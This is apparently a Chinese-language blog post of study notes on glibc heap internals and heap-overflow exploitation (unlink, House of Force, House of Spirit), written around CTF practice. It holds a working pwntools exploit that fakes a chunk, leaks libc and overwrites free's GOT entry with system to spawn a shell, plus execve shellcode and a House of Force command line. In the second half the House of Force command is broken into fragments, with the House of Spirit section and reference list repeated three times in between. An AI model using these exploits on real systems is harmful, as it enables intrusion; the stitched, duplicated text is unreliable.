关于heap overflow的一些笔记

03/17/2017

Kernel Dig

heap概论
heap overflow

本文是总结了互联网上多篇文章后整合而成，如有纰漏还请轻喷。

malloc在unix上通过brk和mmap来分配堆
brk维护一个start_brk,它紧接在未初始化的bss区后，并且向上生长（更高的地址），对于每个进程，内核维护一个brk变量，它指向堆顶。

本来linux默认的是dlmalloc，但是由于其不支持多线程堆管理，所以后来被支持多线程的prmalloc2代替了,prmalloc2能够同时支持多个堆的维护。
对于一个多线程程序，主线程只会拥有一个堆，如果主线程的堆空间用尽，用通过brk来扩展堆直到极限，因为主线程只有一个堆，所以也不会有heap_info这个结构。其他线程可以拥有多个堆，每个堆会有一个heap_info结构，如果一个堆用尽，会使用mmap分配一个新的堆,下图是主线程的堆和子线程堆的区别

下面是线程有多个堆的情况

typedef struct _heap_info
{
  mstate ar_ptr; /* Arena for this heap. */
  struct _heap_info *prev; /* Previous heap. */
  size_t size;   /* Current size in bytes. */
  size_t mprotect_size; /* Size in bytes that has been mprotected
                           PROT_READ|PROT_WRITE.  */
  /* Make sure the following data is properly aligned, particularly
     that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
     MALLOC_ALIGNMENT. */
  char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;

这个结构中最重要的是ar_ptr这个变量，这是一个指向arena的指针，也就是堆本身，size储存着这个堆的大小。

每个arena都有如下结构

struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  */
  struct malloc_state *next_free;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};

可以看到结构体中有两个关键变量top和bins。

top指向一个堆空间，这个堆空间就是我们用来储存数据的地方，在程序的开始只有一个超大堆空间（top chunk），之后的每一次malloc，如果剩下的空间足够分配，系统将从这个堆空间中取出指定大小的空间给程序，比如依次malloc(4*sizeof(int)),malloc(2*sizeof(int)),堆空间应该是这样的

bin数组由双向链表组成，这些双向链表内储存的是被释放（free）的堆空间（chunk），也就是说，在程序开始的时候，这些链表是空的（为什么有很多双向链表？因为每个双向链表维护的被释放空间大小不同，为了方便快速找到对应大小的空间，开发人员就设计了多个链表维护不同大小的chunk）

bins链表可以分为

Unsorted bin

Small bin

Large bin

bins里存有126组双向链表

第1组是Unsorted bin

第2 到 63组是Small bin

第64 到 126组是Large bin

Unsorted bin:当一个chunk被free时，会检测紧邻（前面或后面）的chunk是否为freed状态，如果有，这些free掉的chunk会通过unlink脱掉原来的bin进行一次合并,合并后的chunk就被加入Unsorted bin的首位。这个bin内的chunk没有大小限制

Small bin:小于512字节的chunk被free后会加入Small bin，Small bin在malloc和free时比Large bin快，比fast bins慢。
当Small bin内没有符合的chunk时，会从Unsorted bin中取出chunk，如果Small bin内有符合的chunk，会从bin的尾部取出该chunk

Large bin:大于或等于512字节的chunk被free后会加入Large bin，和Small bin不同，Large bin的每个双向链表上储存的chunk大小不是一样的，而是递减的，首位最大，末尾最小，并且在查找chunk时是从后向前查找的

除了这三种bin，还有一种特殊的bin叫做Fast bin

Fast bin:大小在16到80字节的chunk被free后会加入Fast bin，Fast bin在malloc和free中都是最快的，不用于其他bin，Fast bin是单链表，删除和加入都在首位进行。Fast bin的每一组链表都是8字节递增，比如第一组都是16字节大小的chunk，第二组都是是24字节…注意，最大的Fast bin大小是64字节，而非80字节。
初始状态，Fast bin的max size和链表都是空，如果Fast bin内没有符合的chunk，会从Small bin内取出相应chunk

这些chunk的结构如下

struct malloc_chunk
{
  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

当一个chunk被分配使用，最开始只有前两个变量会被用到，prev_size是前一块chunk的大小，前提是前一块chunk状态是free，如果前一块还在被使用，这4个字节会被前一块chunk共享使用以提高空间使用率，也就是说前一块chunk多了4字节。size是当前chunk的大小。如果当前块的状态是free，就会使用两个额外的变量：fd和bk，这两个变量指向双向链表中的前后节点，至于怎么维护稍后再讲。

现在关心的是，如何知道一个chunk是处于use还是free状态呢？
chunk的结构被强加了一个8字节对齐，这就导致块大小的最低三位总是零，所以只用高29位储存size，低三位储存其他东西，这种情况下，chunk的最低位被指派为标记它的前一块是已分配还是空闲。

比如
一个24（0x18）大小的块，它的前一块chunk是已分配
—————————–
0x00000018 | 0x1 = 0x00000019

一个40（0x28）大小的块，它的前一块chunk是空闲
—————————–
0x00000028 | 0x0 = 0x00000028

倒数第二位表示chunk是否由mmap分配
倒数第三位表示是否储存在main arena

通过将自身chunk的地址+size就能得到下一个chunk的地址，然后检查它的头部最低位就能得到自己的状态

当调用malloc后，程序做的第一件事就是在bins中找是否有符合大小的被释放块，如果有，这个被释放块就会从链表中脱离（unlink），如果没有就在top chunk中紧接着上次分配的chunk后面再分配一个chunk。

unlink的代码如下

/* Take a chunk off a bin list */
#define unlink(P, BK, FD) {                                            \
  FD = P->fd;                                                          \
  BK = P->bk;                                                          \
  FD->bk = BK;                                                         \
  BK->fd = FD;                                                         \
}

仅接上段，如果top chunk的空间也不够分配，程序就会在新的内存空间寻找地址（使用sbrk和mmap，这会使chunk的倒数第二位被标记），然后会把新分配的内存地址返回给malloc。

现在我们还是继续讲unlink，前面说到了在malloc时可能会出现unlink，还有一种情况也可能出现unlink：当在free过程中，如果将要free的chunk的紧邻的chunk（前面或者后面皆可）也是free状态，它们就会合并成一个更大的freed chunk，这就意味着这几个的chunk就会从原来的双向链表中unlink（因为它们的size发生了变化），最后这个合并的chunk会被移入unsorted_chunk链表中

关于unlink的利用，pwnable有一道简单的unlink题

pwn学习笔记汇总（持续更新）

很早之前就有人总结出了unlink的利用技巧，将unlink代码写得直白一点就是

FD = *P + 8;
BK = *P + 12;
FD + 12 = BK;
BK + 8 = FD;

我们能操控的就是FD,BK，要注意，FD+12和BK+8都要保证可写，比如栈，bss，got表，dtors等等，下面介绍一种覆盖dotrs的方法。

gcc提供了一种特性，constructors和destructors，前者可以在main函数执行前运行，后者在main函数退出后运行，就像C++类中的构造函数和析构函数。显然控制构造函数不太现实，程序还没运行起来我们很难在任意地址上写入，理想的做法是控制dtors，dtors和ctors都是由0xFFFFFFFF和0x00000000和中间的函数地址组成，在dtors中0xFFFFFFFF和0x00000000之间的地址都会在main结束后执行，所以如果能覆盖这些地址或者直接覆盖0x00000000（空的dtors只有0xFFFFFFFF 0x00000000），就能执行该地址。

看一段有漏洞的代码

#include 
#include 
int main(int argc, char **argv)
{
  char *first_buf;
  char *second_buf;

  first_buf = (char *)malloc(78 * sizeof(char));
  second_buf = (char *)malloc(20 * sizeof(char));

  strcpy(first_buf, argv[1]);
  free(first_buf);
  free(second_buf);

  return 0;
}

这两个malloc后的堆空间将是这样

first_buf:由于chunk是8字节对齐，78字节会被扩展到80字节，由于prey_size和size占了8字节。size的实际值是0x50+0x8 | 0x1 = 0x59。second_buf:prey_size被first_buf共享了，所以它的size是 0x14+0x4 | 0x1 = 0x19。接下来的工作就很简单了，覆盖fd和bk，例如fd = dtors + 0x4 – 0x12，bk = 储存shellcode地址的栈空间，当first_buf被unlink时，dtors就会被复写。

针对这些安全问题的策略也很多
RELRO技术让.ctors, .dtors, .jcr, .dynamic and .got都不可写，即便.got这种动态加载的表，链接器会在程序刚开始执行的时候就把地址写进去然后把got设成只读。

并且上述unlink方法已经被glibc遗弃很久了，现在的unlink使用了如下的检查机制

/* Take a chunk off a bin list */
void unlink(malloc_chunk *P, malloc_chunk *BK, malloc_chunk *FD)
{
	FD = P->fd;
	BK = P->bk;
	if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
		malloc_printerr(check_action,"corrupted double-linked list",P);
	else {
		FD->bk = BK;
		BK->fd = FD;
	}
}

在脱链表时会检查当前chunk是否真的在链表内，如果它前驱的后继不是自己或者后继的前驱不是自己，就直接抛错误。这使unlink利用变得十分困难（并非不可利用），很快人们就发现，如果找到一个指向P的指针，精心伪造一个chunk，使FD->bk和BK->fd=P，这可以通过unlink检查，在接下来的

FD->bk = BK;
BK->fd = FD;

中，这个指针将被FD覆盖，为了使文章易懂，我举一个例子

buffer1=malloc(64);
buffer2=malloc(64);

这里我获得一个指向chunk1的指针buffer1，一个指向chunk2的指针buffer2，在伪造chunk时，使P->fd=buffer1-12，P->bk=buffer1-8，这会使

FD->bk=buffer1-12+12=buffer1
BK->fd=buffer1-8+8=buffer1

最后的结果就是buffer1=buffer1-12，这样我就获得了一个向固定地址写入数据的机会，通过向buffer1写入数据12字节的junk，再写4字节将覆盖buffer1，由于可以将buffer1覆盖为任意4字节，这就从固定地址写入变成了任意地址写入。

弄懂了原理，接下来看看怎么伪造一个chunk：
假如我malloc两个64字节的chunk

通过修改chunk2的size最低位，就能欺骗glibc认为chunk1是free的状态，这时free(chunk2)触发unlink，使buffer1=buffer1-12。
我使用0xmuhe的博客引用的程序为例,给出自己写的exp：

from pwn import *

chunk_addr = 0x8049d60
free_got = 0x8049ce8

def launch_gdb():
    context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
    gdb.attach(proc.pidof(p)[0])


def leak(addr):
    #为了保证任意地址leak，必须让buffer0始终指向buffer0-12，用buffer1作为leak_addr
    setchunk('0', 'A'*0xc+p32(chunk_addr-0xc)+p32(addr))
    #输出buffer1
    recv_addr = printchunk('1')
    print ("leaking "+hex(addr)+" --> " + recv_addr.encode('hex'))
    #if addr!=0x8048000:
    #    launch_gdb()
    return recv_addr

def addchunk(size):
    p.sendline('1')
    p.recvuntil('you want to add:')
    p.sendline(size)
    p.recvuntil('5.Exit\n')

def setchunk(v, data):
    p.sendline('2')
    p.recvuntil('Set chunk index:')
    p.sendline(v)
    p.recvuntil('Set chunk data:')
    p.sendline(data)
    p.recvuntil('5.Exit\n')

def deletechunk(v):
    p.sendline('3')
    p.recvuntil('Delete chunk index:')
    p.sendline(v)
    p.recvuntil('5.Exit\n')

def printchunk(v):
    p.sendline('4')
    p.recvuntil('Print chunk index:')
    p.sendline(v)
    return p.recv(4)

p = process(['/home/etenal/pwnable.kr/heap_overflow/heap'])
for i in range(0,3):
    addchunk('64')

#print (p.recvuntil('index:'))
payload = p32(0)+p32(65)+p32(chunk_addr-0xc)+p32(chunk_addr-0x8)+'A'*(64-4*4)+p32(64)+p32(72)
#payload = 'AAA'
setchunk('0', payload)

deletechunk('1')



pwn_elf = ELF('/home/etenal/pwnable.kr/heap_overflow/heap')
d = DynELF(leak, elf=pwn_elf)
sys_addr = d.lookup('system', 'libc')
print("system addr: %#x" % sys_addr)

setchunk('0', 'A'*12 + p32(free_got))
setchunk('0', p32(sys_addr))
#launch_gdb()
setchunk('2', '/bin/sh')
#system('/bin/sh')
p.sendline('3')
print p.recv(4096)
p.sendline('2')
p.interactive()

除了unlink利用，人们接下来发明了其他的堆溢出方法。
主要有以下几种：

The House of Prime
The House of Mind
The House of Force
The House of Lore
The House of Spirit

The House of Prime

这种方法已经失效，想要了解看看这里吧

The House of Lore

这种方法已经失效，想要了解看看这里吧

The House of Mind
还在整理之中。

The House of Force

能够覆盖top chunk

能够控制一组malloc的大小

最后再调用一次malloc

我们的目标是覆盖top chunk，因为前文说道，top chunk是新分配的chunk来源，当新的chunk被分配，top chunk会将自己分成两部分，一部分给新的chunk，剩下的继续作为top chunk存在，假如我们能控制top chunk，也就能控制每一次malloc的位置，因为我们可以通过malloc精准的size到达内存中任意一个可写的内存地址。

malloc代码如下

static void* _int_malloc(mstate av, size_t bytes)
{
  INTERNAL_SIZE_T nb;             /* normalized request size */
  mchunkptr       victim;         /* inspected/selected chunk */
  INTERNAL_SIZE_T size;           /* its size */
  mchunkptr       remainder;      /* remainder from a split */
  unsigned long   remainder_size; /* its size */

  checked_request2size(bytes, nb); //如果bytes没有超出范围就传给nb

  [...]

  victim = av->top;  //av-top指向top chunk地址
  size = chunksize(victim);
  if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) //如果top chunk大小足够
  {
    remainder_size = size - nb;
    remainder = chunk_at_offset(victim, nb);  //获取新malloc内存地址
    av->top = remainder;
    set_head(victim, nb | PREV_INUSE | (av!=&main_arena ? NON_MAIN_ARENA : 0));
    set_head(remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk(av, victim, nb);
    void *p = chunk2mem(victim);
    if (__builtin_expect (perturb_byte, 0))
      alloc_perturb (p, bytes);
    return p;
  }

  [...]
}

chunk_at_offset的定义如下

#define chunk_at_offset(p, s)  ((mchunkptr)(((char*)(p)) + (s)))

checked_request2size的定义如下

#define checked_request2size(req, sz)                             \
  if (REQUEST_OUT_OF_RANGE (req)) {                                              \
      __set_errno (ENOMEM);                                                      \
      return 0;                                                                      \
    }                                                                              \
  (sz) = request2size (req);

request2size定义如下

#define request2size(req)                                         \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
   MINSIZE :                                                      \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

如果top chunk的大小足够分配，malloc会使用chunk_at_offset来获得新top chunk地址，就是将当前的top chunk地址加上一个offset（新分配chunk的大小），再把新地址赋值给av->top

av->top = remainder;

可见，nb可以通过malloc传入的参数控制，只要能构造出想要的remainder，可以在任意可写地址malloc。

参见下面有漏洞的程序

#include 
#include 
#include 

int main(int argc, char *argv[])
{
	char *buf1, *buf2, *buf3;
	if (argc != 4) return;

	buf1 = malloc(256);
	strcpy(buf1, argv[1]);

	buf2 = malloc(strtoul(argv[2], NULL, 16));

	buf3 = malloc(256);
	strcpy(buf3, argv[3]);

	free(buf3);
	free(buf2);
	free(buf1);

	return 0;
}

为了保证top chunk有足够的大小，我就得覆盖掉top chunk的size变量，所以

argv[1]='A'*260 + '\xFF'*4

这里使用最大的0xFFFFFFFF来覆盖size

保证top chunk大小充足后就开始构造nb，使得nb+旧top地址=目标地址-8
（为什么要-8？因为chunk是8字节对齐，前8字节是头部），这个值会被传给av->top，这一步结束后，如果我再次malloc，就会在目标地址上进行malloc。
经过调试发现旧top地址是0x804b110，free地址是0x0804a008，计算得到0x804a008-0x8-0x804b110=FFFFEEF0

LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
NOPS=$(perl -e 'print "\x90"x 0x10000')
SC=

除了修改free的got表，还能直接修改栈上的返回地址直接跳到shellcode。

The House of Spirit

能通过栈溢出覆写malloc返回的chunk地址

上述chunk被free

再malloc一个同样大小的chunk

能向该chunk写入数据

一旦我控制了malloc返回的ptr指针，也就控制了将来free(ptr)，因此可以free任意一段地址，伪造一个chunk并free掉，重新malloc分配时会将刚才free掉chunk重新分配出来（注意，条件是free掉的chunk大小小于max_size，因为上文提到，Fast bin采用单链表存储，增减都在首位，这能保证free掉的fast bin再次malloc也能得到用一块chunk，由于fast bin的原因，要求覆写的地址离chunk的size地址距离不能超过64字节）

为了保证chunk加入fast bin，chunk的size末三位，IS_MMAPPED和NON_MAIN_ARENA都不能标记，下面是一个有漏洞的程序：

/*
 * blackngel's vulnerable program slightly modified by gb_master
 */
#include 
#include 
#include 

void fvuln(char *str1, int age)
{
  char *ptr1, name[32];
  int local_age;
  char *ptr2;

  local_age = age;

  ptr1 = (char *) malloc(256);
  printf("\nPTR1 = [ %p ]", ptr1);
  strcpy(name, str1);
  printf("\nPTR1 = [ %p ]\n", ptr1);

  free(ptr1);

  ptr2 = (char *) malloc(40);


  snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
  printf("\n%s\n", ptr2);
}

int main(int argc, char *argv[])
{
  int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};

  if (argc == 3)
    fvuln(argv[1], atoi(argv[2]));

  return 0;
}

此时的栈空间如下

很容易找到漏洞

char name[32];
strcpy(name, str1);

通过strcpy造成栈溢出，由于name相对于prt1处于栈的低位，因此栈溢出可以覆盖ptr1，这个时候栈空间如下

由于ptr1被覆盖为0xbffffdf0，所以在free(ptr1)时，我伪造的fake chunk将会被free掉，由于size在ptr1的前四字节，free就会在0xbffffdec上将0x30作为size（注意，栈是向低地址生长，而堆是向高地址生长）。当再次malloc时

ptr2 = (char *) malloc(40);

ptr2就会成为0xbffffdf0，size为0x30的chunk，由于可以在这块chunk内写入数据，就能够覆盖位于0xbffffdf4这块的返回地址，是我可以直接返回到栈上执行shellcode（或者其他任意地址）

参考资料:
Understanding the Heap & Exploiting Heap Overflows

Heap overflow using Malloc Maleficarum

x86 Exploitation 101: “House of Spirit” – Friendly stack overflow

x86 Exploitation 101: “House of Mind” – Undead and loving it…

Understanding glibc malloc

heap vuln -- unlink

\x68\x2f\x73\x68\x5a\x68\x2f\x62\x69\x6e\x89\xe7\x31\xc0\x88\x47\x07\x8d\x57\x0c\x89\x02\x8d\x4f\x08\x89\x39\x89\xfb\xb0\x0b\xcd\x80' STACKADDR=

除了修改free的got表，还能直接修改栈上的返回地址直接跳到shellcode。

The House of Spirit

能通过栈溢出覆写malloc返回的chunk地址

上述chunk被free

再malloc一个同样大小的chunk

能向该chunk写入数据

一旦我控制了malloc返回的ptr指针，也就控制了将来free(ptr)，因此可以free任意一段地址，伪造一个chunk并free掉，重新malloc分配时会将刚才free掉chunk重新分配出来（注意，条件是free掉的chunk大小小于max_size，因为上文提到，Fast bin采用单链表存储，增减都在首位，这能保证free掉的fast bin再次malloc也能得到用一块chunk，由于fast bin的原因，要求覆写的地址离chunk的size地址距离不能超过64字节）

为了保证chunk加入fast bin，chunk的size末三位，IS_MMAPPED和NON_MAIN_ARENA都不能标记，下面是一个有漏洞的程序：

此时的栈空间如下

很容易找到漏洞

通过strcpy造成栈溢出，由于name相对于prt1处于栈的低位，因此栈溢出可以覆盖ptr1，这个时候栈空间如下

参考资料:
Understanding the Heap & Exploiting Heap Overflows

Heap overflow using Malloc Maleficarum

x86 Exploitation 101: “House of Spirit” – Friendly stack overflow

x86 Exploitation 101: “House of Mind” – Undead and loving it…

Understanding glibc malloc

heap vuln -- unlink

\x01\xC0\xFF\xBF' env -i "A=$NOPS$SC" ./example $LARGETOPCHUNK FFFFEEF0 $STACKADDR

除了修改free的got表，还能直接修改栈上的返回地址直接跳到shellcode。

The House of Spirit

能通过栈溢出覆写malloc返回的chunk地址

上述chunk被free

再malloc一个同样大小的chunk

能向该chunk写入数据

一旦我控制了malloc返回的ptr指针，也就控制了将来free(ptr)，因此可以free任意一段地址，伪造一个chunk并free掉，重新malloc分配时会将刚才free掉chunk重新分配出来（注意，条件是free掉的chunk大小小于max_size，因为上文提到，Fast bin采用单链表存储，增减都在首位，这能保证free掉的fast bin再次malloc也能得到用一块chunk，由于fast bin的原因，要求覆写的地址离chunk的size地址距离不能超过64字节）

为了保证chunk加入fast bin，chunk的size末三位，IS_MMAPPED和NON_MAIN_ARENA都不能标记，下面是一个有漏洞的程序：

此时的栈空间如下

很容易找到漏洞

通过strcpy造成栈溢出，由于name相对于prt1处于栈的低位，因此栈溢出可以覆盖ptr1，这个时候栈空间如下

参考资料:
Understanding the Heap & Exploiting Heap Overflows

Heap overflow using Malloc Maleficarum

x86 Exploitation 101: “House of Spirit” – Friendly stack overflow

x86 Exploitation 101: “House of Mind” – Undead and loving it…

Understanding glibc malloc

heap vuln — unlink

Share your thoughts Cancel reply